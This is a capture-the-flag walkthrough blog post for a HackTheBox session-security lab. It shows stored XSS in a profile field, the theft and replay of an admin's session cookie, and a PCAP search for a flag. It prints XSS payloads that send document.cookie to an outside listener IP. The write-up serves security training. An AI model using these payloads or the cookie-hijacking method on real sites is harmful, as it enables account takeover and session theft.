HackTheBox - Session Security - Skills Assessment Walkthrough

Ido AbramovIdo Abramov
3 min read

Scenario

You are currently participating in a bug bounty program.

  • The only URL in scope is http://minilab.htb.net

  • Attacking end-users through client-side attacks is in scope for this particular bug bounty program.

  • Test account credentials:

    • Email: heavycat106

    • Password: rocknrol

  • Through dirbusting, you identified the following endpoint http://minilab.htb.net/submit-solution

Find a way to hijack an admin's session. Once you do that, answer the two questions below.

Walkthrough

The first assignment - Read the flag residing in the admin's public profile. Answer format: [string]

Solution:
We start with adding the host into /etc/hosts:

sudo sh -c 'echo "10.129.50.141  minilab.htb.net" >> /etc/hosts'

Enter the credentials we got:

And we enter the next page:

Next, we will try to find any XSS vulnerabilities:

After we click on the save, we can see nothing happened.

We will click the share button which will take us to the profile page, which seems to execute the XSS, and the country field seems to be the one vulnerable to XSS:

Now that I have found the vulnerable field, I want to try and steal the cookies using XSS, using the next payload:

<img src=x onerror=fetch(`http://10.10.14.242:81?c=${document.cookie}`)>

** At first I tried the next payload, in the output it replaces the ‘+’ sign with space and breaks it, so I had to use another payload which excludes ‘+’ sign

<img src=x onerror="http://10.10.14.242:81/?c="+document.cookie>

Start a python HTTP server listening to incoming request on port 81:

And insert the payload:

Boom - we got our cookie, means the XSS payload for stealing cookies works !

Next, we go to:

We miss URL parameter, let's add it with the value of the share URL of our account:

We receive that the admin visited the profile:

And we got the admin’s cookie !

Update the cookie in our browser and refresh:

And we are in the admin’s account !

The flag is in the admin’s public profile, but we don’t have a share button, so we will enter Change Visibility and make it public:

And a new share button appeared:

As we click the share button we can see the admin’s profile and we find the 1st flag !

1st flag is captured.

The second assignment - Go through the PCAP file residing in the admin's public profile and identify the flag. Answer format: FLAG{string}.

Solution:

Next, we got the Flag2 to download, a PCAP file to investigate. Open it with Wireshark.

wireshark download-pcap.pcap

After that we can search for a string which includes ‘flag’ and we find a HTTP request with the 2nd flag:

And also captured the 2nd flag !

0
Subscribe to my newsletter

Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#HackTheBoxhack-the-boxXSSCBBHsessionHijackingWeb App Security#WebAppSecurity

Written by

Ido Abramov
Ido Abramov